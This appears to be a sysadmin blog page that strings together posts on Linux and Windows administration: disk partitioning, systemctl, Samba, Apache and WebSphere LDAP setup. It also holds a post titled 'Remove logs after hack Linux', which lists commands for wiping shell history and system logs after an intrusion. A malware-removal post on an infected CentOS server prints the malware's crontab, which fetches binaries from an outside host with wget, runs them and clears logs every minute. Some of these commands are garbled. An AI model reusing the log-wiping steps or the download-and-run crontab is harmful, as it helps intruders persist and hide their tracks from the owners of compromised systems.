2012 SERVER (64)
2016 windows (9)
AIX (13)
Amazon (40)
Ansibile (19)
Apache (135)
Asterisk (2)
cassandra (2)
Centos (230)
- ftp (5)
- IPTABLES (15)
- SFTP (1)
- swap (3)
Centos RHEL 7 (270)
centos8 (3)
chef (3)
cloud (2)
cluster (3)
Coherence (1)
DB2 (5)
DISK (25)
DNS (9)
Docker (31)
Eassy (11)
ELKS (1)
EXCHANGE (3)
Fedora (6)
GIT (3)
GOD (2)
Grub (1)
Hacking (10)
Hadoop (6)
health (2)
horoscope (23)
Hyper-V (10)
IIS (15)
JAVA (7)
JBOSS (32)
jenkins (1)
Kubernetes (9)
Ldap (5)
Linux (189)
Linux Commands (166)
Load balancer (5)
mariadb (14)
Mongodb (4)
MQ Server (24)
MYSQL (84)
Nagios (5)
NaturalOil (13)
Nginx (36)
Ngix (1)
openldap (1)
Openstack (6)
Oracle (35)
Perl (3)
Postfix (19)
Postgresql (1)
PowerShell (2)
Python (3)
qmail (36)
Redis (12)
RHCE (28)
SCALEIO (1)
Security on Centos (29)
Shell (64)
Solaris (58)
Sql Server 2012 (4)
squid (3)
SSH (10)
SSL (14)
Storage (1)
TIPS on Linux (28)
tomcat (62)
Ubuntu (1)
Uncategorized (30)
Veritas (2)
vfabric (1)
VMware (28)
Weblogic (38)
Websphere (71)
Windows (19)
Windows Software (2)
wordpress (1)
ZIMBRA (17)

Remove logs after hack Linux

1.echo “unset MAILCHECK” >> /etc/profile
2.rm -rf /root/.bash_history
3.touch /root/.bash_history
4.history -r
5.cd /var/log > dmesg
6.cd /var/log > auth.log
7.cd /var/log > alternatives.log
8.cd /var/log > boot.log
9.cd /var/log > btmp
10.cd /var/log > cron
11.cd /var/log > cups
12.cd /var/log > daemon.log
13.cd /var/log > dpkg.log
14.cd /var/log > faillog
15.cd /var/log > kern.log
16.cd /var/log > lastlog
17.cd /var/log > maillog
18.cd /var/log > user.log
19.cd /var/log > Xorg.x.log
20. cd /var/log > anaconda.log
21.cd /var/log > yum.log
22.cd /var/log > secure
23.cd /var/log > wtmp
24.cd /var/log > utmp
25.cd /var/log > messages
26.cd /var/log > spooler
27.cd /var/log > sudolog
28.cd /var/log > aculog
29.cd /var/log > access-log
30.cd /root > .bash_history
31. history -c

MBR vs GPT

MBR is the standard partitioning scheme that’s been used on hard disks since the PC first came out. It supports 4 primary partitions per hard drive, and a maximum partition size of 2TB.

GPT disks are new, and are readable only by Windows Server 2003 SP1, Windows Vista (all versions), and Windows XP x64 Edition. The GPT disk itself can support a volume up to 2^64 blocks in length. (For 512-byte blocks, this is 9.44 ZB – zettabytes. 1 ZB is 1 billion terabytes). It can also support theoretically unlimited partitions.

Windows restricts these limits further to 256 TB for a single partition (NTFS limit), and 128 partitions.

Only Itanium systems running Windows Server 2003 and Windows Vista systems with an EFI BIOS can boot from a GPT disk. The other operating systems mentioned earlier can use GPT disks as data disks but not boot disks.

MBR Disk Layout

The following diagram from the Microsoft TechNet Library provides an example of a typical MBR disk layout

Figure 1: MBR Disk Layout

Perhaps one of the biggest pitfalls of MBR-based disks is their potential for corruption of the partition table, a region on the disk that maps sectors to logical block numbers. MBR disks only have 1 partition table to keep track of all the blocks in the partition. If the table becomes corrupt, the entire disk must be recovered from backup. Windows GPT-based disks have multiple, redundant partition tables so that if one is detected as being corrupt, it can self-heal itself from a redundant copy of the table.

For compatibility purposes, the Master Boot Record is kept at LBA 0 in GPT-based drives, and the GPT header begins at LBA 1. The partition type of a GPT disk is marked as 0xEE, which prevents MBR-based disk utilities from recognizing the partition type and potentially corrupting the data. It is possible to convert an MBR disk to a GPT-based disk and vice versa, but any data must first be backed up and all the partitions deleted.

GPT-based Disk Layout

The following diagram from the Microsoft TechNet Library provides an example of the disk layout for a GPT-based disk.

Removing Linux BASH SHELLSHOCKER MALWARE

unknow processes dsfref, gfhddsfew, dsfref etc are starting automatically in centos 6.5

Virus mainly present in /etc/init.d/. Virus will run automatic on the time system start, so remove entry from /etc/init.d. These are virus and its locations

/etc/dsfref,

/etc/gfhddsfew

/etc/dsfref

To Remove Virus from linux

Note: I used chattr -i to change permissions and deleted the file sfewfesfs, when i tried to delete the file without using chattr, its says permissions cant be changed/file cant be deleted . and one more thing, when i used command #rm /etc/sfewfesfs without chattr , the computer restarted, it happened all the time i tried to delete the file without chattr. and these executables show up in running processes only when internt is connected.

Linux will be poisoned? Why is not this wonderful thing makes me met, and people really like me there, but fortunately there is, or is not depressed brother ~
situation is server access is very slow, can not access basic Gesanchaiwu! DNSpod Santianliangtou email me “D Monitoring notice: Your website inaccessible.”
Machine is CentOS, open port 22 root privileges, password length 9 all lowercase letters plus numbers erratic.
VPS service provider immediately to inquire about the situation, the feedback was informed of the results of the virus, was hacked

chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
chattr -i /etc/gfhjrtfyhuf*
rm -rf /etc/gfhjrtfyhuf*
chattr -i /etc/dsfrefr*
rm -rf /etc/dsfrefr*
chattr -i /etc/sdmfdsfhjfe*
rm -rf /etc/sdmfdsfhjfe*
chattr -i /etc/rewgtf3er4t*
rm -rf /etc/rewgtf3er4t*
chattr -i /etc/gfhddsfew*
rm -rf /etc/gfhddsfew*
chattr -i /etc/ferwfrre*
rm -rf /etc/ferwfrre*
Recently, I received a call from one of my client regarding the slowness(almost not responsive) of their linux server(running CentOS) and rapid increase in their network traffic. Fortunately this is one of the their lab servers and they did not incur any production outages.

Here is the output of the top command on this server:

top command – text
top screenshot
.
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1252 root 20 0 66.0g 2.9g 380 S 725.2 38.0 11935:13 .sshdd141199598
2025 root 20 0 423m 1760 0 S 3.2 0.0 0:39.98 gdmorpen
14295 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
14297 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
8316 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8318 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.47 .sshhdd14119186
8319 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.27 .sshhdd14119186
8321 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.11 .sshhdd14119186
8338 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.67 .sshhdd14119186
8339 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.67 .sshhdd14119186
8341 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8345 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.10 .sshhdd14119186
8360 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.59 .sshhdd14119186
8364 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.95 .sshhdd14119186
8371 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.94 .sshhdd14119186
8380 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.65 .sshhdd14119186

top

Here are the steps that I followed to remove this malware and hopefully this will helps others having the similar issue.

1. Disconnect the server from network.

2. Take the backup of root crontab and remove the root crontab. You can restore any relevant entries that you are aware of from the backup.

3. Remove the following files:
#rm /etc/gfhjrtfyhuf
#rm /etc/sfewfesfs
#rm /etc/gdmorpen
#rm /etc/fdsfsfvff
#rm /etc/rewgtf3er4t
#rm /etc/smarvtd
#rm /etc/whitptabil
#rm /etc/.SSH2

In case you are not able delete any of the above file, you might have to change the permissions and then remove the file:
#chattr -i /etc/sfewfesfs
#rm /etc/sfewfesfs

4. Remove the following files from /tmp directory:
#rm /tmp/gfhjrtfyhuf
#rm /tmp/sfewfesfs
#rm /tmp/gdmorpen
#rm /tmp/fdsfsfvff
#rm /tmp/rewgtf3er4t
#rm /tmp/smarvtd
#rm /tmp/whitptabil
#rm /tmp/.sshdd*

5. Remove file – S99local from /etc/rc.d directory
#rm /etc/rc2.d/S99local
#rm /etc/rc2.d/S99local
#rm /etc/rc3.d/S99local
#rm /etc/rc4.d/S99local

6. Disable remote root login:

open the file etc/ssh/sshd_config and comment change the following value to “no”:
# Prevent root logins:
PermitRootLogin no

6. Connect/enable network.

7. Update System:
#yum update

8. Now check the current running process and make sure that there are no strange process that are running.

Into the server and found that the machine stop contracting out, bandwidth filled (5 minutes can send 10G). 100% cpu usage, the name can be seen under the topsfewfesfs process there .sshddXXXXXXXXXXX (a string of random numbers) process. / Etc / down to see the name sfewfesfs, nhgbhhj and other strange names “red name” file.
22-port operation is also needed because the network service provider in the case not to force, only select the backup data reloading! Here the detoxification method of publicity, and then respondBrute force tactics are also summarized below:
If you are within the network users, modify the external network to map port 22 to XXXX, change the root password:

passwd
22 closed root privileges
found in the / etc / ssh / sshd_config file remove # PermitRootLogin changed

PermitRootLogin no
View occupied port

netstat -atunlp
See sfewfesfs and .sshdd1401029348 contracting process
View the process position

ll /proc/??PID
Delete virus files

chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
See suspicious file named nhgbhhj be deleted, etc.

rm -rf /etc/nhgbhhj
rm -rf /etc/nhgbhhj***
To delete a scheduled task ( very important ), the virus by the resurrection!

rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/root.1
.SSH2 See hidden files with ls -al, delete

rm -rf /etc/.SSH2
.sshdd1401029348 See hidden files with ls -al, delete

rm -rf /tmp/.sshdd140*
Restart the server to get.
Great God emphasize online: root privileges port 22 open or not, nozuonodie, for the first time experienced linux poisoning once thought it was a very secure operating system in -_- !, once it felt cool, careless.
Poisoning reason to remind

But the 22-port for VPS renter is to be opened, and the need to root account and privileges! Swollen what to do?
—- The following is important to emphasize in this article where —-
seemingly secure system is how the invasion of the pinch? The reason is that port 22 is open, with a simple root username + password, for example:
root123
Hackers use of brute force, is to use the “User Name” + “Password” exhaustive manner remote login, because Linux system default administrator username is root, just brute force password crackers, you can only nozuonodie the ~~
Recruit

Other trick it? Is to change the root user name 🙁 no specific order, you can only modify the configuration file)
root user login, vi modify / etc / passwd & / etc / shadow
(Not sure which of the two documents, please learn:/ Etc / passwd & / etc / shadow Comments )

vi /etc/passwd
Press the i key to enter edit mode
to modify the 1st row a root for a new user name
, press esc to exit edit mode, and enter: x save and exit

vi /etc/shadow
Press the i key to enter edit mode
to modify the 1st row a root for a new user name
, press esc to exit edit mode, and enter:! x forced to save and exit
NOTE: In order to properly use sudo, you need to modify / etc / sudoers settings, modify as follows (fromHow to add Users to / etc / sudoers ):

vi /etc/sudoers
Find the root ALL = (ALL) ALL
add the following line: a new username ALL = (ALL) ALL
: x forced to save and exit!
Reconnect, enter a new user name + the original root password! You’re done! !
Attached virus script

*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo “unset MAILCHECK” >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c

Centos 7 SYSTEMCTL && Run level && hostname

Centos 7 SYSTEMCTL && Run level && hostname

Centos 7 SYSTEMCTL && Run level && hostname

systemctl start httpd.service (service httpd start)

systemctl stop httpd.service ( service httpd stop)

systemctl restart httpd.service ( service httpd stop)

systemctl status httpd.service ( service httpd status)

systemctl enable httpd.service (chkconfig httpd on)

systemctl disable httpd.service (chkconfig httpd off)

job chkconfig?service systemctl
Service boot from the start chkconfig –level 3 httpd on systemctl enable httpd
Service does not boot from the start chkconfig –level 3 httpd off systemctl disable httpd

Service Status service httpd status systemctl status HTTP d (service details)

systemctl is-active httpd

Start the status of all services chkconfig –list systemctl list-units –type=service
Start Service service httpd start systemctl start httpd
Out of service service httpd stop systemctl stop httpd
Restart the service service httpd restart systemctl restart httpd

[root@keeplive ~]# cat /etc/inittab
# inittab is no longer used when using systemd.
#
# ADDING CONFIGURATION HERE WILL HAVE NO EFFECT ON YOUR SYSTEM.
#
# Ctrl-Alt-Delete is handled by /etc/systemd/system/ctrl-alt-del.target
#
# systemd uses ‘targets’ instead of runlevels. By default, there are two main targets:
#
# multi-user.target: analogous to runlevel 3
# graphical.target: analogous to runlevel 5
#
# To set a default target, run:
#
# ln -sf /lib/systemd/system/.target /etc/systemd/system/default.target

From the command-line switch to the window level level command unchanged: init 5 or startx

Level by the window switch to the command line level commands unchanged: init 3

The new version of the run level is defined in the /lib/systemd/system:

[root@keeplive ~]# ls -ltr /lib/systemd/system/runlevel*.target
lrwxrwxrwx. 1 root root 15 Nov 13 08:46 /lib/systemd/system/runlevel0.target -> poweroff.target
lrwxrwxrwx. 1 root root 13 Nov 13 08:46 /lib/systemd/system/runlevel1.target -> rescue.target
lrwxrwxrwx. 1 root root 17 Nov 13 08:46 /lib/systemd/system/runlevel2.target -> multi-user.target
lrwxrwxrwx. 1 root root 17 Nov 13 08:46 /lib/systemd/system/runlevel4.target -> multi-user.target
lrwxrwxrwx. 1 root root 17 Nov 13 08:46 /lib/systemd/system/runlevel3.target -> multi-user.target
lrwxrwxrwx. 1 root root 16 Nov 13 08:46 /lib/systemd/system/runlevel5.target -> graphical.target
lrwxrwxrwx. 1 root root 13 Nov 13 08:46 /lib/systemd/system/runlevel6.target -> reboot.target

You can set different run levels for different needs:

init 3

[root@keeplive ~]# ln -svf /lib/systemd/system/runlevel3.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/runlevel3.target’
[root@keeplive ~]# ln -svf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/multi-user.target’
[root@keeplive ~]# systemctl set-default multi-user.target
rm ‘/etc/systemd/system/default.target’
ln -s ‘/usr/lib/systemd/system/multi-user.target’ ‘/etc/systemd/system/default.target’
[root@keeplive ~]#

INIT5

[root@keeplive ~]# ln -svf /lib/systemd/system/runlevel5.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/runlevel5.target’
[root@keeplive ~]# ln -svf /lib/systemd/system/graphical.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/graphical.target’
[root@keeplive ~]# systemctl set-default graphical.target
rm ‘/etc/systemd/system/default.target’
ln -s ‘/usr/lib/systemd/system/graphical.target’ ‘/etc/systemd/system/default.target’

Modify the system run level:
1, systemd use than run the target level sysvinit more liberal alternative. Run Level 3 replaced by multi-user.target. Run Level 5 replaced by graphical.target. runlevel3.target and runlevel5.target are directed multi-user.target and graphical.target symbolic links.
You can use the following command to switch to “run level 3”:
multi-user.target systemctl isolate or systemctl isolate runlevel3.target

You can use the following command to switch to the “Run Level 5”:
systemctl isolate graphical.target or systemctl isolate runlevel5.target

2, how to change the default runlevel?
systemd use links to point to the default run level. Before creating a new link, can use the following command to remove the presence of link: rm /etc/systemd/system/default.target
default startup run level 3:
ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target

ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

systemd does not use /etc/inittab file.

Modify CentOS 7 hostname

In CentOS, there are three definitions hostname: static (static), transient (transient), and flexible (pretty). “Static” host name is also called kernel hostname, is the system at boot time from /etc/hostname
automatic initialization of the host name. “Transient” host name is in the system is running temporarily assigned host name, for example, assigned by DHCP or mDNS server.
Static hostname and transient hostname comply with the same character as the Internet domain restriction rules. On the other hand, a “flexible” is allowed to use
the hostname of free-form (including special / whitespace) host name, to show to the end user (eg Linuxidc).

In CentOS 7, a man named hostnamectl command-line tool that allows you to view or modify the host name associated with the configuration.

[root@keeplive ~]# hostnamectl
Static hostname: keeplive
Icon name: computer
Chassis: n/a
Machine ID: 2b48dba259f2428ca8038f7aeb1d7f15
Boot ID: 57772bec11854cd08ee72db54a1441d3
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-123.9.3.el7.x86_64
Architecture: x86_64
[root@keeplive ~]# hostnamectl status
Static hostname: keeplive
Icon name: computer
Chassis: n/a
Machine ID: 2b48dba259f2428ca8038f7aeb1d7f15
Boot ID: 57772bec11854cd08ee72db54a1441d3
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-123.9.3.el7.x86_64
Architecture: x86_64
[root@keeplive ~]# hostnamectl –static
keeplive
[root@keeplive ~]# hostnamectl –transient
keeplive
[root@keeplive ~]# hostnamectl –pretty

[root@rhel7 ~]# systemctl list-unit-files|grep enabled
cups.path enabled
abrt-ccpp.service enabled
abrt-oops.service enabled
abrt-vmcore.service enabled
abrt-xorg.service enabled
abrtd.service enabled
accounts-daemon.service enabled
atd.service enabled
auditd.service enabled
avahi-daemon.service enabled
bluetooth.service enabled
chronyd.service enabled
crond.service enabled
cups.service enabled
dbus-org.bluez.service enabled
dbus-org.fedoraproject.FirewallD1.service enabled
dbus-org.freedesktop.Avahi.service enabled
dbus-org.freedesktop.ModemManager1.service enabled
dbus-org.freedesktop.NetworkManager.service enabled
dbus-org.freedesktop.nm-dispatcher.service enabled
display-manager.service enabled
dmraid-activation.service enabled
firewalld.service enabled
firstboot-graphical.service enabled
gdm.service enabled
getty@.service enabled
hypervkvpd.service enabled
hypervvssd.service enabled
irqbalance.service enabled
iscsi.service enabled
ksm.service enabled
ksmtuned.service enabled
libstoragemgmt.service enabled
libvirtd.service enabled
lvm2-monitor.service enabled
mdmonitor.service enabled
microcode.service enabled
ModemManager.service enabled
multipathd.service enabled
NetworkManager-dispatcher.service enabled
NetworkManager.service enabled
nfs-lock.service enabled
packagekit-offline-update.service enabled
postfix.service enabled
rhsmcertd.service enabled
rngd.service enabled
rpcbind.service enabled
rsyslog.service enabled
rtkit-daemon.service enabled
smartd.service enabled
spice-vdagentd.service enabled
sshd.service enabled
sysstat.service enabled
systemd-readahead-collect.service enabled
systemd-readahead-drop.service enabled
systemd-readahead-replay.service enabled
tuned.service enabled
vmtoolsd.service enabled
avahi-daemon.socket enabled
cups.socket enabled
dm-event.socket enabled
iscsid.socket enabled
iscsiuio.socket enabled
lvm2-lvmetad.socket enabled
rpcbind.socket enabled
default.target enabled
graphical.target enabled
nfs.target enabled
remote-fs.target enabled

[root@rhel7 ~]# systemctl stop firewalld.service
[root@rhel7 ~]# systemctl disable firewalld.service
[root@rhel7 ~]# systemctl status firewalld.service
firewalld.service – firewalld – dynamic firewall daemon
Loaded: loaded (/usr/lib/systemd/system/firewalld.service; disabled)
Active: inactive (dead)

DEC 29 22:25:43 rhel7 systemd[1]: Started firewalld – dynamic firewall daemon.
DEC 29 22:43:29 rhel7 systemd[1]: Stopping firewalld – dynamic firewall daemon…
DEC 29 22:43:29 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:14 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:15 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:19 rhel7 systemd[1]: Starting firewalld – dynamic firewall daemon…
DEC 29 22:44:19 rhel7 systemd[1]: Started firewalld – dynamic firewall daemon.
DEC 29 22:44:21 rhel7 systemd[1]: Stopping firewalld – dynamic firewall daemon…
DEC 29 22:44:21 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.
DEC 29 22:44:32 rhel7 systemd[1]: Stopped firewalld – dynamic firewall daemon.

systemctl start firewalld.service
systemctl stop firewalld.service
systemctl restart firewalld.service
systemctl status firewalld.service
systemctl enable firewalld.service
systemctl disable firewalld.service
systemctl is-enabled firewalld.service;echo $?
systemctl list-unit-files|grep enabled

Centos 7 Samba

Centos 7 Samba

FILEDOC /samba/docs
LEARDOCS /samba/tech

rpm -qi samba

mkdir -p /samba/docs
mkdir -p /samba/tech

ulimit -n 16384

vi /etc/security/limits.conf
* – nofile 16384

cd /etc/samba/

cp smb.conf smb.conf.origin

[global]
workgroup=FILESERVER
netbios name=SERVER1
server string=Samba Server
#security=share
security=user
map to guest = Bad User
[SHAREDOCS]
path=/samba/tech
readonly=yes
browseable=yes
guest ok=yes
[TECHDOCS]
path =/samba/tech
public = no
writable = yes
write list = @GROUP1
validusers = @GROUP1

useradd test1
useradd test2
useradd test3
useradd GROUP1

useramod -a -G GROUP1 test1
useramod -a -G GROUP1 test2
useramod -a -G GROUP1 test3

smbpasswd -a test1
smbpasswd -a test2
smbpasswd -a test3

chown GROUP1:GROUP1 /samba/tech
chmod 770 /samba/tech

ll -d /samba/tech

systemctl restart smb
systemctl enable smb
systemctl status smb

# smbclient-L localhost -U test1%P@ssw0rd
Domain=[FILESERVER] OS=[Unix] Server=[Samba 4.1.1]

Sharename Type Comment
——— —- ——-
SHAREDOCS Disk
TECHDOCS Disk
IPC$ IPC IPC Service (Samba Server)

Domain=[TECHDOCS] OS=[Unix] Server=[Samba 4.1.1]

Server Comment
——— ——-

Workgroup Master
——— ——-

C:\>netuse * /del

\\192.168.1.18\d$

C:\>netuse \\192.168.1.13 P@ssw0rd /U:test1

Centos7 Apache HTTP SERVER

Centos7 Apache HTTP SERVER

yum -y install httpd

rpm -qi httpd

systemctl enable httpd.service

ln -s ‘/usr/lib/systemd/system/httpd.service’ ‘/etc/systemd/system/multi-user.target.wants/httpd.service’

chkconfig httpd on

systemctl enable httpd

mkdir /wwwroot/www
echo “www.rmohan.com” > /wwwroot/www/index.html

mkdir /wwwroot/crm
echo “rmohan.com” > /wwwroot/crm/index.html

cd /etc/httpd/
mkdir vhost-conf.d
echo “Include vhost-conf.d/*.conf” >> conf/httpd.conf

ServerName www.rmohan.com
DocumentRoot /wwwroot/www/

Requireall granted

ServerName crm.linuxidc.local
DocumentRoot /wwwroot/crm/

Require ip 192.168.188.0/24

systemctl status httpd.service

systemctl restart httpd.service

journalctl -n

LDAP repository in Websphere Application Server 7

his is to record the steps i used to switch LDAP repository in Websphere Application Server 7 and enabled LDAP over SSL.

Lets Start

Point your browser to the WAS console and login using admin account.

Add in the new LDAP server configurations

As i use a few repositories in my environment, i would be updating the repositories in the “Federated repositories” section.

Click on left column’s link: Security -> Global Security -> Configure (the drop down box is pointed to “Federated repositories”

The page refreshed, look for “Manage repositories” -> Add

Fill the following.
– Repository identifier
– Directory type (here, i used IBM TDS)
– Primary hostname (put in IP, if you have the entry in /etc/hosts, can use hostname)
– Port (389 for a start. Later will be updated to 636)
– Bind DN (The account to connect to LDAP server)

Click Apply when you are done. Then Click Save. Wait for sync to finish and click OK.

If there is something wrong, WAS will complain.

i.e.
cannot reach the LDAP server. (ACL/firewall??)
wrong port
Bind DN is wrong
etc

Import LDAP server SSL

Store the SSL certificate as a flat file in the WAS server. You may need to convert the SSL certificate to “der” format and deposit the certificate to the deployment manager directory.

Create WAS Truststore

We will create the key store in WAS to store keys and certificate for LDAP. Idea is to separate key store for different functions.

By java definition, keystore is an object that holds personal certificate. truststore is a Java object that holds signer certificates. I gather we will only create the truststore since WAS security guide listed this step.

Click Security -> SSL Certificate and key management -> keystores and certificates

Then click New

Fill up the following
– Name (i used LDAPTruststore)
– Management scope (IBM security guide recommended cell level)
– Path (Where you want to store this key store)
– Password

Import the LDAP SSL certiticate into LDAPTruststore

From the breadcrumb of the previous step, Click on “LDAPTruststore” and Signer certificates.

Click Add

Fill up the following
– Alias (i used ldapcert)
– File Name (the path to the LDAP ssl certificate you put in previous step.)

Click Apply when you are done. Then Click Save. Wait for sync to finish and click OK

Creating SSL alias link to the Trust store

We will create Click Security -> SSL certificate and key management -> SSL configuration.

Click New

Fill up the following
– Name (I used LDAPSSLSettings)
– Trust store name (its LDAPTruststore)
– Key store name (its LDAPTruststore)
– Management Scope (Its Cell Level)

Click OK then Save then OK.

We are now ready to enable LDAP over SSL communication to LDAP server

Go back to the repository.

Click Security -> Global Security -> Configure (drop down bar should point to “Federated repositories”)

When the page refreshed, Click “Manage repositories”

Fill up the following
– Port (change to 636)

Check the “Require SSL communication”

Choose the radio button “use specific SSL alias” and select LDAPSSLSettings from the drop down menu.

Click Apply when you are done. Then Click Save. Wait for sync to finish and click OK

Add the Base DN

Here, we need to configure from where in LDAP server we should make the queries.

Click Security -> Global Security -> Configure (drop down bar should point to “Federated repositories”)

Click the “Add base entry to realm” button

Fill up the following
– Repository (Put in the name you used for “Repository identifier”)
– OU (Put in the Base DN here)

Click Apply when you are done. Then Click Save. Wait for sync to finish and click OK

A little housekeeping

Removethe base DN for the old LDAP server.

Click on the base DN -> remove
Then Click Save. Wait for sync to finish and click OK

Click on Manage repositories
Check the old repository -> delete
Then Click Save. Wait for sync to finish and click OK

Restart AppSvr, NodeMgr and Dmgr

To be safe, i would prefer to restart everything and make sure i still can log in as administrator and the application would have no problem working with the new LDAP server.

Check the Dmgr logs, AppSvr logs for signs of errors.

A small test

Click on “users and groups” -> manage users
Search for some valid users and verify that they come from the new LDAP server.
Get the software team to verify too in case the problem is subtle enough not to be caught in the application logs.

Allowing longer web session going through Apache to Websphere Application Server

Had a tough one last month when migrating the system to WAS. I’m still new to WAS, hit a few problems and take this chance to document down so that this form my reference and hopefully it help you too.

Users has been complaining that the web service keep getting time out, returning a 500 error.

What i found out was that i can actually, tune the “ServerIOTimeout” parameter in the WAS plugin for Apache beyond the default. i used 900, which is 15min in seconds.

In addition,a little performance fine tuning was done using “LoadBalanceWeight” to keep the application servers from being ‘hit’ random when they are just started up, especially when i have a cluster of them. As recommended by IBM specialist, i used some numbers, with one of the application server assigned to an odd number, different from the rest.

The idea is to make one of the application server the first one to serve, instead of randomising it.

Server CloneID=”179d3la” ConnectTimeout=”5″ ExtendedHandshake=”false” LoadBalanceWeight=”20″ MaxConnections=”-1″ Name=”Node1″ ServerIOTimeout=”900″ WaitForContinue=”false”
…
…
